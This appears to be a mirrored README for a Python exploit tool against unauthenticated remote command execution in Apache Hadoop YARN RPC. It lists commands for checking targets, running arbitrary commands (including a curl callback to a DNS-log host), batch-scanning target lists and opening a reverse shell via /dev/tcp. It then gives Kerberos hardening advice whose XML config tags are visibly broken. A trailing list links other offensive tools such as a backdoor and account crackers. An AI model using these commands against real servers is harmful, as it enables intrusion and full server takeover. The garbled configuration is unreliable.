Hadoop Yan RPC unauthorized RCE

Last update: Nov 24, 2022

Overview

Vuln Impact

On November 15, 2021, A security researcher disclosed that there was an unauthorized access vulnerability in Hadoop yarn RPC. This vulnerability existed in Hadoop yarn, the core component of Hadoop. Because Hadoop yarn opened the RPC service to the public by default, a remote attacker could take advantage of this unauthorized vulnerability and execute arbitrary commands through the RPC service, so as to control the target server, In view of the high-risk status and great harm of this vulnerability, and the details have been disclosed and exploited by the opposition, it is recommended that all users using Apache Hadoop conduct self-examination and take security measures in time.

Vuln Product

Apache Hadoop Yarn *

Vunl Check

Basic usage

python3 Hadoop_Yan_RPC_RCE.py

Vuln check

python3 Hadoop_Yan_RPC_RCE.py -v true -t http://www.target.com

command execute

python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com  -c "curl xxx.dnslog.cn"

batch scan

python3 Hadoop_Yan_RPC_RCE.py -s true -f target.txt

Reserve Shell

& /dev/tcp/ip/port 0>&1" ">

python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "bash -i >& /dev/tcp/ip/port 0>&1"

Reference

https://nosec.org/home/detail/4905.html

https://github.com/N0b1ta/Bit-Cannon/tree/master/Apache/Hadoop/YARN/hadoop-yarn-rest-api-unauth

Safety Advice

1.Enable Kerberos authentication to prevent unauthorized access.

<property>
    <name>hadoop.security.authenticationname>
    <value>kerberosvalue>
    <final>falsefinal>
    <source>core-site.xmlsource>
property>...
<property>
    <name>hadoop.rpc.protectionname>
    <value>authenticationvalue>
    <final>falsefinal>
    <source>core-default.xmlsource>
property>

2.Prohibit external addresses from accessing Hadoop RPC service related ports or configured to be open only to trusted addresses.

Solemnly declare: Don't use this tool for illegal operation. This tool is only used for safety self checking by Party A's personnel and Party B's personnel.If the user uses it illegally, the legal responsibility shall be borne by the user!!!.

Hadoop Yan RPC unauthorized RCE

Related tags

Overview

Vuln Impact

Vuln Product

Vunl Check

Basic usage

Vuln check

command execute

batch scan

Reserve Shell

Reference

Safety Advice

Owner

Al1ex

CVE-2021-21972

Getting my gitlab commit history into github

Cracker - Tools CRACK FACEBOOK DAN INSTAGRAM DENGAN FITUR BANYAK

Infoga is a tool gathering email accounts informations (ip,hostname,country,...) from different public source

Script for automatic dump and brute-force passwords using Volatility Framework

Python script that sends CVE-2021-44228 log4j payload requests to url list

A TCP Backdoor made in python

Automatically fetch, measure, and merge subscription links on the network, use Github Action

This is a Crypto asset tracker that I built to aid my personal journey in cryptocurrencies.

Click-Jack - Automatic tool to find Clickjacking Vulnerability in various Web applications

A proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228)

Privacy-respecting metasearch engine

POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL Pre-Auth RCE Injection Vulneralibity.

Just another script for automatize boolean-based blind SQL injections.

Argument Injection in Dragonfly Ruby Gem

Password-Manager GUI

A script based on sqlmap that uses sql injection vulnerabilities to traverse the existence of a file

Deobfuscate Log4Shell payloads with ease

A small POC plugin for launching dumpulator emulation within IDA, passing it addresses from your IDA view using the context menu.

A python script to decrypt media files encrypted using the Android application 'Decrypting 'LOCKED Secret Calculator Vault''. Will identify PIN / pattern.